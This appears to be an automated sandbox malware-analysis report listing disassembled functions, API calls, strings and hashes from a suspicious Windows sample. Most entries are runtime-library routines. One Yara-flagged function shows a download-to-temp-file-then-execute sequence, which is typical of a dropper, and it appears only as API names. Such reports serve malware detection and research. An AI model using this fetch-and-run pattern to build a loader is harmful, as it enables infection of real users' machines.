Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80

_free.LIBCMT ref: 0043A631

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043A653
_free.LIBCMT ref: 0043A668
_free.LIBCMT ref: 0043A673
_free.LIBCMT ref: 0043A695
_free.LIBCMT ref: 0043A6A8
_free.LIBCMT ref: 0043A6B6
_free.LIBCMT ref: 0043A6C1
_free.LIBCMT ref: 0043A6F9
_free.LIBCMT ref: 0043A700
_free.LIBCMT ref: 0043A71D
_free.LIBCMT ref: 0043A735

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction ID: f5f6d892b7e162680270ba0694072865b062da135816e678cf6525fe08cd79ed
Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
Instruction Fuzzy Hash: E6318B716006009FEB21AF3AD846B5773E8FF18315F18A41FE499C6251DB39ED608B1A

Function 00439A89 Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00439AD1
_free.LIBCMT ref: 00439AF5
_free.LIBCMT ref: 00439B02
_free.LIBCMT ref: 00439B27
_free.LIBCMT ref: 00439B34
_free.LIBCMT ref: 00439B3D
_free.LIBCMT ref: 00439E1B
_free.LIBCMT ref: 00439E23

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction ID: 5833a6d57b494697f4826b29985624930ca7ec9e215e7e0b09aa607084295bdd
Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
Instruction Fuzzy Hash: 2CC15372E40205BBEB20DBA8CD43FEF77B8AB58704F15515AFA04FB282D6B49D418B54

Function 02512C5B Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 134filenetworksynchronizationCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02512C7E
InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 02512C94
GetTempPathW.KERNEL32(00000105,?), ref: 02512CB0
GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02512CC6
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02512CFF
InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02512D3B
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02512D58
ShellExecuteExW.SHELL32(?), ref: 02512DCF
WaitForSingleObject.KERNEL32(?,00008000), ref: 02512DE4

Strings

<, xrefs: 02512DAC

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
String ID: <
API String ID: 838076374-4251816714
Opcode ID: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction ID: 4f426157600044e5f10940358d2edf17303475880dc2cdabb30023d2b4e0c431
Opcode Fuzzy Hash: 6a1df9d8d931caabd250c55c7ad4b4351e218200b760aecaacf5835990ef0e97
Instruction Fuzzy Hash: 72412F7190022DAFEB209F64DC85FEA77BCFB05745F0081E5A549E2150DF709E868FA8

Function 0252EEC2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0252F228,00000004,02527D87,00000004,02528069), ref: 0252EEF9
GetLastError.KERNEL32(?,0252F228,00000004,02527D87,00000004,02528069,?,02528799,?,00000008,0252800D,00000000,?,?,00000000,?), ref: 0252EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0252F228,00000004,02527D87,00000004,02528069,?,02528799,?,00000008,0252800D,00000000,?,?,00000000), ref: 0252EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0252EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0252EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0252EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0252EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0252EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0252EF9D

Strings

advapi32.dll, xrefs: 0252EEF3, 0252EEF8, 0252EF14

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction ID: 41a7a4137ef73ce1dbb0de1cbcb8fcf7120069a0716ffa55bcdcee877325c407
Opcode Fuzzy Hash: b1b79d5369405be0947094fd1898dbb8d0f25fa0b2a305c733e5edde1381297e
Instruction Fuzzy Hash: 88218675904711BFE7106F74DC09A9ABFA8FF06716F004A2AF555D3680CB7C94418FA8

Function 0252EEC5 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C13,000000FF,?,0252F228,00000004,02527D87,00000004,02528069), ref: 0252EEF9
GetLastError.KERNEL32(?,0252F228,00000004,02527D87,00000004,02528069,?,02528799,?,00000008,0252800D,00000000,?,?,00000000,?), ref: 0252EF05
LoadLibraryW.KERNEL32(advapi32.dll,?,0252F228,00000004,02527D87,00000004,02528069,?,02528799,?,00000008,0252800D,00000000,?,?,00000000), ref: 0252EF15
GetProcAddress.KERNEL32(00000000,00447430), ref: 0252EF2B
GetProcAddress.KERNEL32(00000000,00000000), ref: 0252EF41
GetProcAddress.KERNEL32(00000000,00000000), ref: 0252EF58
GetProcAddress.KERNEL32(00000000,00000000), ref: 0252EF6F
GetProcAddress.KERNEL32(00000000,00000000), ref: 0252EF86
GetProcAddress.KERNEL32(00000000,00000000), ref: 0252EF9D

Strings

advapi32.dll, xrefs: 0252EEF3, 0252EEF8, 0252EF14

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ErrorLast
String ID: advapi32.dll
API String ID: 2340687224-4050573280
Opcode ID: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction ID: 981edf442bd7d2472f4738ef70581b86a9e085d8e087131ffb2d8d6fe9e56db9
Opcode Fuzzy Hash: 65d3570880ea5d838512f96381691d3386102deee3282de167715cc0b76a9286
Instruction Fuzzy Hash: FB2151B5904711BFE7106F64DC09A9ABFECFF06B16F004A2AF555D3690CBBC94418BA8

Function 025224A7 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 63libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0252670B), ref: 025224B6
GetProcAddress.KERNEL32(00000000,00446CDC), ref: 025224C4
GetProcAddress.KERNEL32(00000000,00446CF4), ref: 025224D2
GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0252670B), ref: 02522500
GetProcAddress.KERNEL32(00000000), ref: 02522507
GetLastError.KERNEL32(?,?,?,0252670B), ref: 02522522
GetLastError.KERNEL32(?,?,?,0252670B), ref: 0252252E
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02522544
__CxxThrowException@8.LIBVCRUNTIME ref: 02522552

Strings

kernel32.dll, xrefs: 025224B0, 025224B5, 025224FA

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
String ID: kernel32.dll
API String ID: 4179531150-1793498882
Opcode ID: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction ID: 53a5cf12c8a97cd5d1ec8bf53370037c8347ae9bd9fc870934b33fbbd825dcdc
Opcode Fuzzy Hash: 1e04dd94cd55fca8ec38f5d852553bd0c5fa5d9a4266e3884da298c5c245e2aa
Instruction Fuzzy Hash: 7111C67DA003217FE7157F74AC5996B7BACBD46B12B10052AB801E61D1EB78D9048A6C

Function 0042484D Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424866

Part of subcall function 00424B35: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424599), ref: 00424B45

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042487B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042488A
__CxxThrowException@8.LIBVCRUNTIME ref: 00424898
Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042490E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042494E
__CxxThrowException@8.LIBVCRUNTIME ref: 0042495C

Strings

switchState, xrefs: 00424882
pContext, xrefs: 00424946

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
String ID: pContext$switchState
API String ID: 3151764488-2660820399
Opcode ID: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction ID: 2510875a34d85c59997f50971944281e03e0fb8bb22fa9aac23d9a99742e70f3
Opcode Fuzzy Hash: 219df9cbfeb1429f4312672cca97738a090813e365a6f1d89fd3b539392bd973
Instruction Fuzzy Hash: 5F31F635B00224ABCF04EF65D881A6EB7B9FF84314F61456BE815A7381DB78EE05C798

Function 00419746 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419768
GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419772
DuplicateHandle.KERNEL32(00000000), ref: 00419779
SafeRWList.LIBCONCRT ref: 00419798

Part of subcall function 00417767: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417778
Part of subcall function 00417767: List.LIBCMT ref: 00417782

std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197AA
GetLastError.KERNEL32 ref: 004197B9
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197CF
__CxxThrowException@8.LIBVCRUNTIME ref: 004197DD

Strings

eventObject, xrefs: 004197A2

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
String ID: eventObject
API String ID: 1999291547-1680012138
Opcode ID: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction ID: 481122be4c91591a449bb5dcd4d0178f9edd258f0a599c8a0e64e7baae7edbbd
Opcode Fuzzy Hash: a400a672ae4bfdaa01994e5aaa8cdae1f15ced21a90c909c370a8ff226bbabcd
Instruction Fuzzy Hash: 7A11A075500104EACB14EFA5CC49FEF77B8AF00701F24022BF519E21D1EB789A84C66D

Function 025253A5 Relevance: 15.2, APIs: 10, Instructions: 175COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 025254B0

Part of subcall function 02524EC1: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 02524ED5

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 025254D9

Part of subcall function 0252333B: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02523357

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 02525500
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 025253BA

Part of subcall function 0252339F: __EH_prolog3_GS.LIBCMT ref: 025233A6
Part of subcall function 0252339F: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 025233B5
Part of subcall function 0252339F: GetProcessAffinityMask.KERNEL32(00000000), ref: 025233BC
Part of subcall function 0252339F: GetCurrentThread.KERNEL32 ref: 025233E4
Part of subcall function 0252339F: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 025233EE

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 025253DB
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02525412
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 02525455
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 02525548
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 0252556C
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 02525579

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
String ID:
API String ID: 64082781-0
Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction ID: ef878dc592ef1f571b3762ca747479ec1507d5e30171eab0a8fce924aab70454
Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction Fuzzy Hash: 79618D71A003219FDB1CCF64E8D166DBBA2FB86316F64807DD046972D2E735A948CF88

Function 0041513E Relevance: 15.2, APIs: 10, Instructions: 175COMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415249

Part of subcall function 00414C5A: Concurrency::details::platform::__GetLogicalProcessorInformationEx.LIBCONCRT ref: 00414C6E

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415272

Part of subcall function 004130D4: Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004130F0

Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCONCRT ref: 00415299
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415153

Part of subcall function 00413138: __EH_prolog3_GS.LIBCMT ref: 0041313F
Part of subcall function 00413138: GetCurrentProcess.KERNEL32(0045CB84,0045CB88,00000024), ref: 0041314E
Part of subcall function 00413138: GetProcessAffinityMask.KERNEL32(00000000), ref: 00413155
Part of subcall function 00413138: GetCurrentThread.KERNEL32 ref: 0041317D
Part of subcall function 00413138: Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00413187

Concurrency::details::ResourceManager::GetTopologyInformation.LIBCONCRT ref: 00415174
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151AB
Concurrency::details::ResourceManager::ApplyAffinityRestrictions.LIBCMT ref: 004151EE
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004152E1
Concurrency::details::ResourceManager::CaptureProcessAffinity.LIBCONCRT ref: 00415305
Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00415312

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: Concurrency::details::$AffinityManager::Resource$ApplyRestrictions$InformationProcess$Topology$CaptureCurrentHardware$Affinity::CleanupConcurrency::details::platform::__FindGroupH_prolog3_LogicalMaskProcessorRestriction::Thread
String ID:
API String ID: 64082781-0
Opcode ID: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction ID: 68d129af9073e170e0bd2ed5c1ca810268e1faaa5ea0560f3945f8c62b51e45f
Opcode Fuzzy Hash: 1ecb225e08598ee27c8c099d749289d9fb610fb0746485e2ea13aa543c18698c
Instruction Fuzzy Hash: 8B619B72A00715DFDB18CFA5E8D26EEB7B1FB84316F24806ED45697242D738A981CF48

Function 02530C26 Relevance: 15.1, APIs: 10, Instructions: 136threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02530C36
Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02530C9D
Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02530CBA
Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02530D20
Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02530D35
Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02530D47
Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02530D75
Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02530D80
__CxxThrowException@8.LIBVCRUNTIME ref: 02530DAC
Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02530DBC

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
String ID:
API String ID: 3720063390-0
Opcode ID: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction ID: a5126f6f4b42db0e0779ad7705a6ecac2aa454634d2d0e2ca68d043892855e65
Opcode Fuzzy Hash: 771ecb464f7cbbc53463eb78e9650550d29affee346428328e6f851ddce87dca
Instruction Fuzzy Hash: 1041D130A0431A9ADF06FFA4C4547FDBBA6BF82304F045469D8066B2C2CB259A09CB6D

Function 0254204D Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 02542061

Part of subcall function 025436D1: HeapFree.KERNEL32(00000000,00000000,?,0254A35F,?,00000000,?,00000000,?,0254A603,?,00000007,?,?,0254A9F7,?), ref: 025436E7
Part of subcall function 025436D1: GetLastError.KERNEL32(?,?,0254A35F,?,00000000,?,00000000,?,0254A603,?,00000007,?,?,0254A9F7,?,?), ref: 025436F9

_free.LIBCMT ref: 0254206D
_free.LIBCMT ref: 02542078
_free.LIBCMT ref: 02542083
_free.LIBCMT ref: 0254208E
_free.LIBCMT ref: 02542099
_free.LIBCMT ref: 025420A4
_free.LIBCMT ref: 025420AF
_free.LIBCMT ref: 025420BA
_free.LIBCMT ref: 025420C8

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 0c4b9121c5f04dcba516dc2ab23614cc63467d88678b149f272d48529362b0d1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: E011A27620011ABFCB41EF94C941CD9BBA6FF44354B2181A1BA188F231DB71EEA09F84

Function 00431DE6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431DFA

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00431E06
_free.LIBCMT ref: 00431E11
_free.LIBCMT ref: 00431E1C
_free.LIBCMT ref: 00431E27
_free.LIBCMT ref: 00431E32
_free.LIBCMT ref: 00431E3D
_free.LIBCMT ref: 00431E48
_free.LIBCMT ref: 00431E53
_free.LIBCMT ref: 00431E61

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction ID: 861173ad91a1010c78510ab484a24ed9c78665ad215b99cbbf48ba7f2ea438f1
Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
Instruction Fuzzy Hash: 5811B9B6600508BFDB02EF5AC852CD93BA5EF18755F0190AAF9084F232D635DF559F84

Function 0042E1B2 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 0042E1DE
__cftoe.LIBCMT ref: 0042E210

Strings

F(@, xrefs: 0042E25E, 0042E1CC, 0042E261
F(@, xrefs: 0042E229, 0042E1C0

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: __cftoe
String ID: F(@$F(@
API String ID: 4189289331-2038261262
Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction ID: f7128e803ecc638eadc91937d15ccb8599414b14ec088efe1e3a9152a03639fe
Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
Instruction Fuzzy Hash: 35511A32600215EBEB209F5BAC41FAF77A9EF49324F94425FF81592282DB39D900866D

Function 0043EEA2 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044018F), ref: 0043EEC5

Strings

sqrt, xrefs: 0043F049
log, xrefs: 0043EF6B, 0043EF77
acos, xrefs: 0043F03D
exp, xrefs: 0043EF8A, 0043EFEC
log10, xrefs: 0043EF0F, 0043EF5F
pow, xrefs: 0043EFA9, 0043F055, 0043F068
asin, xrefs: 0043F031

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction ID: 8170d9845b751ca2959588a2f937d780391b5e174033125a046a2bd7c9c475e6
Opcode Fuzzy Hash: aa1c02400c42ddcfd268636a8d8394cc3decb473de125785aaadf9f4f02fbad0
Instruction Fuzzy Hash: 3351AF7090050EDBDF14DF99E6481ADBBB0FB4D300F2551A7E480A7295C77A8D29CB1E

Function 02543190 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction ID: 906b6d57997d5c3927e3221258475aec6330a5584134a564a8dc86196608d221
Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
Instruction Fuzzy Hash: 04C1E370E04246BBDB12DFA8C845BEDFFB1BF49318F644599E814A72A1CB309941CF69

Function 004286D0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 004286FB
___except_validate_context_record.LIBVCRUNTIME ref: 00428703
_ValidateLocalCookies.LIBCMT ref: 00428791
__IsNonwritableInCurrentImage.LIBCMT ref: 004287BC
_ValidateLocalCookies.LIBCMT ref: 00428811

Strings

fB, xrefs: 004287AE, 004287B7, 004287C8
csm, xrefs: 004287A6

Memory Dump Source

Source File: 00000000.00000002.4103720960.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EbXj93v3bO.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 1170836740-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 7444ce20eee9e01817f939fbe5b18052b9a848ec9e24e3aae95877e68e098c30
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: F241FB34F012289BCF10DF19DC41A9EBBB5AF84318F64816FE9145B392DB399D11CB99

Function 0252C6C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45COMMONLIBRARYCODE

Download Yara Rule

APIs

atomic_compare_exchange.LIBCONCRT ref: 0252C6DC
atomic_compare_exchange.LIBCONCRT ref: 0252C700
std::_Cnd_initX.LIBCPMT ref: 0252C711
std::_Cnd_initX.LIBCPMT ref: 0252C71F

Part of subcall function 02511370: __Mtx_unlock.LIBCPMT ref: 02511377

std::_Cnd_initX.LIBCPMT ref: 0252C72F

Part of subcall function 0252C3EF: __Cnd_broadcast.LIBCPMT ref: 0252C3F6

Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0252C73D

Strings

t#D, xrefs: 0252C6C2

Memory Dump Source

Source File: 00000000.00000002.4104248439.0000000002510000.00000040.00001000.00020000.00000000.sdmp, Offset: 02510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2510000_EbXj93v3bO.jbxd

Yara matches

Similarity

API ID: Cnd_initstd::_$atomic_compare_exchange$Cnd_broadcastConcurrency::details::_Counter::_Mtx_unlockRelease
String ID: t#D
API String ID: 4258476935-1671555958
Opcode ID: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
Instruction ID: be2e68f9df4a088fe1e29b0d384866e91eb84cbcec24e2a38c3bc385d8621452
Opcode Fuzzy Hash: e23295e8cd53ad3a663e09b033d10301f0236dd426b47c7b657df0c7463be66e
